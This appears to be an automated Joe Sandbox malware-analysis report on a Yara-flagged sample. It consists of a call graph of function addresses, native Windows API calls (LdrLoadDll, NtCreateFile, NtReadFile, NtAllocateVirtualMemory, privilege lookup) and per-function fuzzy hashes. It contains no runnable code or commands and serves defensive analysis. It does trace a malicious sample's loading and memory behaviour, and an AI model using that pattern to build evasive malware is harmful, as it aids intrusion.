41a68c RtlFreeHeap 97178->97179 97180 41af60 LdrLoadDll 97178->97180 97179->96930 97180->97179 97182 407eb0 97181->97182 97183 407eab 97181->97183 97184 41bd40 2 API calls 97182->97184 97183->96848 97187 407ed5 97184->97187 97185 407f38 97185->96848 97186 419ec0 2 API calls 97186->97187 97187->97185 97187->97186 97188 407f3e 97187->97188 97193 41bd40 2 API calls 97187->97193 97197 41a5c0 97187->97197 97189 407f64 97188->97189 97191 41a5c0 2 API calls 97188->97191 97189->96848 97192 407f55 97191->97192 97192->96848 97193->97187 97195 40817e 97194->97195 97196 41a5c0 2 API calls 97194->97196 97195->96809 97196->97195 97198 41af60 LdrLoadDll 97197->97198 97199 41a5dc 97198->97199 97202 1722c70 LdrInitializeThunk 97199->97202 97200 41a5f3 97200->97187 97202->97200 97204 41b5c3 97203->97204 97207 40acf0 97204->97207 97208 40ad14 97207->97208 97209 40ad50 LdrLoadDll 97208->97209 97210 409c5b 97208->97210 97209->97210 97210->96817 97212 40b063 97211->97212 97214 40b0e0 97212->97214 97226 419c90 LdrLoadDll 97212->97226 97214->96822 97216 41af60 LdrLoadDll 97215->97216 97217 40f1bb 97216->97217 97217->96830 97218 41a7d0 97217->97218 97219 41af60 LdrLoadDll 97218->97219 97220 41a7ef LookupPrivilegeValueW 97219->97220 97220->96826 97222 41a27c 97221->97222 97223 41af60 LdrLoadDll 97221->97223 97227 1722ea0 LdrInitializeThunk 97222->97227 97223->97222 97224 41a29b 97224->96827 97226->97214 97227->97224 97229 40b1f0 97228->97229 97230 40b040 LdrLoadDll 97229->97230 97231 40b204 97230->97231 97231->96761 97233 40ae4d 97232->97233 97234 40ae51 97232->97234 97233->96764 97235 40ae6a 97234->97235 97236 40ae9c 97234->97236 97278 419cd0 LdrLoadDll 97235->97278 97279 419cd0 LdrLoadDll 97236->97279 97238 40aead 97238->96764 97240 40ae8c 97240->96764 97242 40f4a0 3 API calls 97241->97242 97243 4143c6 97242->97243 97243->96766 97245 408a79 97244->97245 97280 4087a0 97244->97280 97247 408a9d 97245->97247 97248 4087a0 19 API calls 97245->97248 97247->96768 97249 408a8a 97248->97249 97249->97247 97298 40f710 10 API calls 97249->97298 97252 41af60 LdrLoadDll 97251->97252 97253 41a51c 97252->97253 97417 1722e80 LdrInitializeThunk 97253->97417 97254 40c322 97256 40f4a0 97254->97256 97257 40f4bd 97256->97257 97418 419fc0 97257->97418 97260 40f505 97260->96772 97261 41a010 2 API calls 97262 40f52e 97261->97262 97262->96772 97264 41af60 LdrLoadDll 97263->97264 97265 41a02c 97264->97265 97424 1722d10 LdrInitializeThunk 97265->97424 97266 40c385 97266->96778 97266->96781 97269 41af60 LdrLoadDll 97268->97269 97270 41a07c 97269->97270 97425 1722d30 LdrInitializeThunk 97270->97425 97271 40c459 97271->96789 97274 41af60 LdrLoadDll 97273->97274 97275 419e3c 97274->97275 97426 1722fb0 LdrInitializeThunk 97275->97426 97276 40c4ac 97276->96793 97278->97240 97279->97238 97281 407ea0 4 API calls 97280->97281 97296 4087ba 97281->97296 97282 408a3f 97283 408160 2 API calls 97282->97283 97284 408a49 97283->97284 97284->97245 97287 419f00 2 API calls 97287->97296 97289 41a490 LdrLoadDll NtClose 97289->97296 97292 40c4c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 97292->97296 97295 419e20 2 API calls 97295->97296 97296->97282 97296->97284 97296->97287 97296->97289 97296->97292 97296->97295 97299 419d10 97296->97299 97302 4085d0 97296->97302 97314 40f5f0 LdrLoadDll NtClose 97296->97314 97315 419d90 LdrLoadDll 97296->97315 97316 419dc0 LdrLoadDll 97296->97316 97317 419e50 LdrLoadDll 97296->97317 97318 4083a0 97296->97318 97334 405f60 LdrLoadDll 97296->97334 97298->97247 97300 41af60 LdrLoadDll 97299->97300 97301 419d2c 97300->97301 97301->97296 97303 4085e6 97302->97303 97335 419880 97303->97335 97305 4085ff 97313 408771 97305->97313 97356 4081a0 97305->97356 97307 4086e5 97308 4083a0 11 API calls 97307->97308 97307->97313 97309 408713 97308->97309 97310 419f00 2 API calls 97309->97310 97309->97313 97311 408748 97310->97311 97312 41a500 2 API calls 97311->97312 97311->97313 97312->97313 97313->97296 97314->97296 97315->97296 97316->97296 97317->97296 97319 4083c9 97318->97319 97396 408310 97319->97396 97322 41a500 2 API calls 97323 4083dc 97322->97323 97323->97322 97324 408467 97323->97324 97327 408462 97323->97327 97404 40f670 97323->97404 97324->97296 97325 41a490 2 API calls 97326 40849a 97325->97326 97326->97324 97328 419d10 LdrLoadDll 97326->97328 97327->97325 97329 4084ff 97328->97329 97329->97324 97408 419d50 97329->97408 97331 408563 97331->97324 97332 414a50 8 API calls 97331->97332 97333 4085b8 97332->97333 97333->97296 97334->97296 97336 41bf90 2 API calls 97335->97336 97337 419897 97336->97337 97363 409310 97337->97363 97339 4198b2 97340 4198f0 97339->97340 97341 4198d9 97339->97341 97344 41bd40 2 API calls 97340->97344 97342 41bdc0 2 API calls 97341->97342 97343 4198e6 97342->97343 97343->97305 97345 41992a 97344->97345 97346 41bd40 2 API calls 97345->97346 97348 419943 97346->97348 97353 419be4 97348->97353 97369 41bd80 97348->97369 97350 419bd0 97351 41bdc0 2 API calls 97350->97351 97352 419bda 97351->97352 97352->97305 97354 41bdc0 2 API calls 97353->97354 97355 419c39 97354->97355 97355->97305 97357 40829f 97356->97357 97358 4081b5 97356->97358 97357->97307 97358->97357 97359 414a50 8 API calls 97358->97359 97361 408222 97359->97361 97360 408249 97360->97307 97361->97360 97362 41bdc0 2 API calls 97361->97362 97362->97360 97364 409335 97363->97364 97365 40acf0 LdrLoadDll 97364->97365 97366 409368 97365->97366 97368 40938d 97366->97368 97372 40cf20 97366->97372 97368->97339 97370 419bc9 97369->97370 97390 41a580 97369->97390 97370->97350 97370->97353 97373 40cf4c 97372->97373 97374 41a1e0 LdrLoadDll 97373->97374 97375 40cf65 97374->97375 97376 40cf6c 97375->97376 97383 41a220 97375->97383 97376->97368 97380 40cfa7 97381 41a490 2 API calls 97380->97381 97382 40cfca 97381->97382 97382->97368 97384 41a23c 97383->97384 97385 41af60 LdrLoadDll 97383->97385 97389 1722ca0 LdrInitializeThunk 97384->97389 97385->97384 97386 40cf8f 97386->97376 97388 41a810 LdrLoadDll 97386->97388 97388->97380 97389->97386 97391 41af60 LdrLoadDll 97390->97391 97392 41a59c 97391->97392 97395 1722f90 LdrInitializeThunk 97392->97395 97393 41a5b7 97393->97370 97395->97393 97397 408328 97396->97397 97398 40acf0 LdrLoadDll 97397->97398 97399 408343 97398->97399 97400 414e50 LdrLoadDll 97399->97400 97401 408353 97400->97401 97402 408369 PostThreadMessageW 97401->97402 97403 408370 97401->97403 97402->97403 97403->97323 97405 40f683 97404->97405 97411 419e90 97405->97411 97409 41af60 LdrLoadDll 97408->97409 97410 419d6c 97408->97410 97409->97410 97410->97331 97412 41af60 LdrLoadDll 97411->97412 97413 419eac 97412->97413 97416 1722dd0 LdrInitializeThunk 97413->97416 97414 40f6ae 97414->97323 97416->97414 97417->97254 97419 41af60 LdrLoadDll 97418->97419 97420 419fdc 97419->97420 97423 1722f30 LdrInitializeThunk 97420->97423 97421 40f4fe 97421->97260 97421->97261 97423->97421 97424->97266 97425->97271 97426->97276 97430 1722ad0 LdrInitializeThunk

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 0 41a40a-41a459 call 41af60 NtReadFile
                                                                                                  APIs
                                                                                                  • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_GCeHcfCef8.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FileRead
                                                                                                  • String ID: 1JA$rMA$rMA
                                                                                                  • API String ID: 2738559852-782607585
                                                                                                  • Opcode ID: c7503813edf94be5ba2c54e22c21c5466bd20650403fe145047da1cd5fbab9bb
                                                                                                  • Instruction ID: fc01f0a9a7a463296cdf2ddec04be91dd5259237522f72ac8338e5fe6fb0ed92
                                                                                                  • Opcode Fuzzy Hash: c7503813edf94be5ba2c54e22c21c5466bd20650403fe145047da1cd5fbab9bb
                                                                                                  • Instruction Fuzzy Hash: F0F0E7B2200108ABCB08DF89CC80DEB77A9EF8C714F15824DBA0D97250C630E911CBA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 3 41a410-41a426 4 41a42c-41a459 NtReadFile 3->4 5 41a427 call 41af60 3->5 5->4
                                                                                                  APIs
                                                                                                  • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_GCeHcfCef8.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FileRead
                                                                                                  • String ID: 1JA$rMA$rMA
                                                                                                  • API String ID: 2738559852-782607585
                                                                                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                  • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                                                                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                  • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 319 40acf0-40ad0c 320 40ad14-40ad19 319->320 321 40ad0f call 41cc50 319->321 322 40ad1b-40ad1e 320->322 323 40ad1f-40ad2d call 41d070 320->323 321->320 326 40ad3d-40ad4e call 41b4a0 323->326 327 40ad2f-40ad3a call 41d2f0 323->327 332 40ad50-40ad64 LdrLoadDll 326->332 333 40ad67-40ad6a 326->333 327->326 332->333
                                                                                                  APIs
                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_GCeHcfCef8.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Load
                                                                                                  • String ID:
                                                                                                  • API String ID: 2234796835-0
                                                                                                  • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                                  • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                                                                                  • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                                  • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 334 41a360-41a3b1 call 41af60 NtCreateFile
                                                                                                  APIs
                                                                                                  • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_GCeHcfCef8.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 823142352-0
                                                                                                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                  • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                                                                                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                  • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 337 41a53a-41a556 338 41a55c-41a57d NtAllocateVirtualMemory 337->338 339 41a557 call 41af60 337->339 339->338
                                                                                                  APIs
                                                                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_GCeHcfCef8.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 2167126740-0
                                                                                                  • Opcode ID: 07c2f2a55d289a23ca3af0e7479e1b599d270403919e1d51021987e9256cce8c
                                                                                                  • Instruction ID: f8e3cdc54e06309fc8146fb881595e2c36c995c32cb6fa008751c380793c3acf
                                                                                                  • Opcode Fuzzy Hash: 07c2f2a55d289a23ca3af0e7479e1b599d270403919e1d51021987e9256cce8c
                                                                                                  • Instruction Fuzzy Hash: 5BF0F8B6210208AFDB14DF89CC81EEB77A9AF8C654F158149FA4997242C634F911CBA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 340 41a540-41a57d call 41af60 NtAllocateVirtualMemory
                                                                                                  APIs
                                                                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_GCeHcfCef8.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 2167126740-0
                                                                                                  • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                  • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                                                                                  • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                  • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 343 41a48a-41a48d 344 41a481-41a489 343->344 345 41a48f-41a4b9 call 41af60 NtClose 343->345
                                                                                                  APIs
                                                                                                  • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_GCeHcfCef8.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Close
                                                                                                  • String ID:
                                                                                                  • API String ID: 3535843008-0
                                                                                                  • Opcode ID: e2be188ce8e28698715a585d23a03873186ee3c95f2e991be30aa04d5b9dba93
                                                                                                  • Instruction ID: 27b2774977dc75779a16d9e6a36301c1ab18ded06c0ae9908cf23c73c8696345
                                                                                                  • Opcode Fuzzy Hash: e2be188ce8e28698715a585d23a03873186ee3c95f2e991be30aa04d5b9dba93
                                                                                                  • Instruction Fuzzy Hash: B8E0D8726001187ED614EBE8DC45EEBB76CEF80754F15405BF50C5B142C531B1208BE4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_GCeHcfCef8.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Close
                                                                                                  • String ID:
                                                                                                  • API String ID: 3535843008-0
                                                                                                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                  • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                                                                                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                  • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 27ed98bc164759fc79cf5c69d89e31a5986eb4a68e10331bfaafc6e188f19042
                                                                                                  • Instruction ID: 90475fe564f00fcaf59f92ca76ad8764ecbad08d013a904f25e07b2649e04a79
                                                                                                  • Opcode Fuzzy Hash: 27ed98bc164759fc79cf5c69d89e31a5986eb4a68e10331bfaafc6e188f19042
                                                                                                  • Instruction Fuzzy Hash: 3890026120640003420571584414616801A97E0201B55C131F14185A0EC5358A927226
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 94023c3d9fbaab9193cd15ca5292440c3e15c312b06672bc5ea742d9701a6661
                                                                                                  • Instruction ID: 854c6406b916558cabc38ba6537350b92266ea81803af4c06e23bfe67cace625
                                                                                                  • Opcode Fuzzy Hash: 94023c3d9fbaab9193cd15ca5292440c3e15c312b06672bc5ea742d9701a6661
                                                                                                  • Instruction Fuzzy Hash: 6B90023120540802D2807158440464A401597D1301F95C125B0429664ECA258B5A77A2
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 11e032369647a2463192265004c49a65392a922c1a82c61e8facb5cca6a196a8
                                                                                                  • Instruction ID: 491a2bcdcdf7f3233392113e96753e797eb294d3fcde8b91f791260762d260eb
                                                                                                  • Opcode Fuzzy Hash: 11e032369647a2463192265004c49a65392a922c1a82c61e8facb5cca6a196a8
                                                                                                  • Instruction Fuzzy Hash: A4900225215400030205B5580704507405697D5351355C131F1419560DD6318A626222
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 4bddb92d60b5244ec4e938fdf4841c908383d730655893e7edacaf036ab500cf
                                                                                                  • Instruction ID: d747c61ed36f1554940cfb725d204e5a3809c2c48ec9e6f66cffad3039e79adc
                                                                                                  • Opcode Fuzzy Hash: 4bddb92d60b5244ec4e938fdf4841c908383d730655893e7edacaf036ab500cf
                                                                                                  • Instruction Fuzzy Hash: A290022130540003D240715854186068015E7E1301F55D121F0818564DD9258A576323
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: ae7ec1bd803e75812dd768f543de49e768236b8ff92da3e862aed4f5fc1ac34a
                                                                                                  • Instruction ID: 5eb9d516a2591f4dbdc217ffae48721c1615a548d5a4100f77d9271d44de54b3
                                                                                                  • Opcode Fuzzy Hash: ae7ec1bd803e75812dd768f543de49e768236b8ff92da3e862aed4f5fc1ac34a
                                                                                                  • Instruction Fuzzy Hash: B590022921740002D2807158540860A401597D1202F95D525B0419568DC9258A6A6322
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 5fdd92b6ac3b12b7363d292ff78865ed02a078d06a083519526702b4d0f2b16b
                                                                                                  • Instruction ID: 5217232a2cb55ea064aeab4054190a2d7df2207e23545a224a08ec922dc99159
                                                                                                  • Opcode Fuzzy Hash: 5fdd92b6ac3b12b7363d292ff78865ed02a078d06a083519526702b4d0f2b16b
                                                                                                  • Instruction Fuzzy Hash: 7C90023120540413D21171584504707401997D0241F95C522B0828568ED6668B53B222
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: e39806490d16e3e9e8b2f48ff3c0065e2b6f1b45501cdaf75c96b302aa4e8b3e
                                                                                                  • Instruction ID: 7de905ac48fd691b290e5cf66660229fe76c3949a1420a53ac2ea4649d5e9bc0
                                                                                                  • Opcode Fuzzy Hash: e39806490d16e3e9e8b2f48ff3c0065e2b6f1b45501cdaf75c96b302aa4e8b3e
                                                                                                  • Instruction Fuzzy Hash: 18900221246441525645B15844045078016A7E0241795C122B1818960DC5369A57E722
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 50526eed5ebc5ade91b4eac608054e2f6ffb4d0d24918ef139bb51e6db1be778
                                                                                                  • Instruction ID: 68018c3ede8c79e6a5806f81a4c700c7735b4c58088b2d82032c7ec425bd4b00
                                                                                                  • Opcode Fuzzy Hash: 50526eed5ebc5ade91b4eac608054e2f6ffb4d0d24918ef139bb51e6db1be778
                                                                                                  • Instruction Fuzzy Hash: 9790023120548802D2107158840474A401597D0301F59C521B4828668EC6A58A927222
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: d5f3799a8080fdc3b7c900403d13ad107bb10240c682e98e5306d03ab7c61c28
                                                                                                  • Instruction ID: 1c587284ec189280c96270e73f4e8399cffba7cfc8c278470092161d83855c08
                                                                                                  • Opcode Fuzzy Hash: d5f3799a8080fdc3b7c900403d13ad107bb10240c682e98e5306d03ab7c61c28
                                                                                                  • Instruction Fuzzy Hash: 9D90023120540402D20075985408646401597E0301F55D121B5428565FC6758A927232
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 3a9086641e5c554bd9f84fdd2bb269573d7529ca0a4916d236430102c242f2fd
                                                                                                  • Instruction ID: d2d688d242822a6466c9b327ab4ddb7411b5999d4d87dbbd69e1d3f825feb12e
                                                                                                  • Opcode Fuzzy Hash: 3a9086641e5c554bd9f84fdd2bb269573d7529ca0a4916d236430102c242f2fd
                                                                                                  • Instruction Fuzzy Hash: DC90026134540442D20071584414B064015D7E1301F55C125F1468564EC629CE537227
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: e4365154f3b1f58df165db626324f26aa6b46cb12a050785d8c230a4fb0b5b81
                                                                                                  • Instruction ID: a119c0068eee0cf8dbb9009ff54be28dc1f3bfbc434bf562226ffa6fca9ecd0f
                                                                                                  • Opcode Fuzzy Hash: e4365154f3b1f58df165db626324f26aa6b46cb12a050785d8c230a4fb0b5b81
                                                                                                  • Instruction Fuzzy Hash: 68900221215C0042D30075684C14B07401597D0303F55C225B0558564DC9258A626622
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

